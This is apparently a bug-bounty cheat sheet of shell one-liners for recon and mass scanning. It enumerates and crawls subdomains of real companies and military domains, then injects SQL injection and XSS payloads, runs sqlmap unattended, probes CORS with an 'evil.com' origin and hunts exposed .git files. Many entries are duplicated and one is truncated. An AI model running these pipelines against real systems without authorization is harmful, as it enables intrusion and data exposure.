amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''
SQLINJECTION Mass domain file
- [Explaining command]
httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
Using chaos search js
- [Explaining command]
Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com".
chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#]
Search Subdomain using Gospider
- [Explaining command]
GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS
gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
Using gospider to chaos
- [Explaining command]
GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input.
chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3'
Using recon.dev and gospider crawler subdomains
- [Explaining command]
We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls.
curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew
PSQL - search subdomain using cert.sh
- [Explaining command]
Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs
psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew
Search subdomains using github and httpx
- [Github-search]
Using python3 to search subdomains, httpx filter hosts by up status-code response (200)
./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title
Search SQLINJECTION using qsreplace search syntax error
- [Explained command]
grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"
grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"
Search subdomains using jldc
- [Explained command]
curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
Search subdomains in assetfinder using hakrawler spider to search links in content responses
- [Explained command]
assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla"
assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla"
Search subdomains in cert.sh
- [Explained command]
curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew
curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew
Search subdomains in cert.sh assetfinder to search in link /.git/HEAD
- [Explained command]
curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
Collect js files from hosts up by gospider
- [Explained command]
xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew'
xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew'
Subdomain search Bufferover resolving domain to httpx
- [Explained command]
curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew
curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew
Using gargs to gospider search with parallel proccess
[Explained command]
httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne
[Explained command]
httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne
Injection xss using qsreplace to urls filter to gospider
- [Explained command]
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
Extract URL's to apk
- [Explained command]
apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"
apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"
Chaos to Gospider
- [Explained command]
chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for:" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @
chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for:" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @
Checking invalid certificate
xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx
xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx
Using shodan & Nuclei
- [Explained command]
Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates.
shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/
Open Redirect test using gf.
- [Explained command]
echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates.
echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles".
- [Explained command]
shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
Using Chaos to jaeles "How did I find a critical today?.
- [Explained command]
To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates.
chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
Using shodan to jaeles
- [Explained command]
domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts
domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts
Search to files using assetfinder and ffuf
- [Explained command]
assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:"'
assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:"'
HTTPX using new mode location and injection XSS using qsreplace.
- [Explained command]
httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "'
httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "'
Grap internal juicy paths and do requests to them.
- [Explained command]
export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'
export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'
Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url.
- [Explained command]
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew
Using to findomain to SQLINJECTION.
- [Explained command]
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
Jaeles scan to bugbounty targets.
- [Explained command]
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @
JLDC domain search subdomain, using rush and jaeles.
- [Explained command]
curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'
curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'
Chaos to search subdomains check cloudflareip scan port.
- [Explained command]
chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent
chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent
Search JS to domains file.
- [Explained command]
cat FILE TO TARGET | httpx -silent | subjs | anew
cat FILE TO TARGET | httpx -silent | subjs | anew
Search JS using assetfinder, rush and hakrawler.
- [Explained command]
assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal"
assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal"
Search to CORS using assetfinder and rush
- [Explained command]
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"'
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"'
Search to js using hakrawler and rush & unew
- [Explained command]
cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'
cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'
XARGS to dirsearch brute force.
- [Explained command]
cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js'
cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js'
Assetfinder to run massdns.
- [Explained command]
assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent
assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent
Extract path to js
- [Explained command]
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
Find subdomains and Secrets with jsubfinder
- [Explained command]
cat subdomsains.txt | httpx --silent | jsubfinder search -s
cat subdomsains.txt | httpx --silent | jsubfinder search -s
Search domains to Range-IPS.
- [Explained command]
cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew
cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew
Search new's domains using dnsgen.
- [Explained command]
xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain
xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain
List ips, domain extract, using amass + wordlist
- [Explained command]
amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt
amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt
Search domains using amass and search vul to nuclei.
- [Explained command]
amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30
amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30
Verify to cert using openssl.
- [Explained command]
sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{
N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <(
openssl x509 -noout -text -in <(
openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \
-connect hackerone.com:443 ) )
sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{
N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <(
openssl x509 -noout -text -in <(
openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \
-connect hackerone.com:443 ) )
Search domains using openssl to cert.
- [Explained command]
xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew
xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew
Search domains over IP/ASN using Hurricane Electric.
- [Explained command]
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-domains | httpx -silent -title -tech-detect -status-code
nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-domains | httpx -silent -title -tech-detect -status-code
Search domains using Hudson Rock's cybercrime intelligence data
- [Explained command]
Mass hunting exposed git from a ASN/IP with hednsextractor.
- [Explained command]
hednsextractor -target "your target" -silent | httpx -path /.git/config -status-code -ms 200 -silent
hednsextractor -target "your target" -silent | httpx -path /.git/config -status-code -ms 200 -silent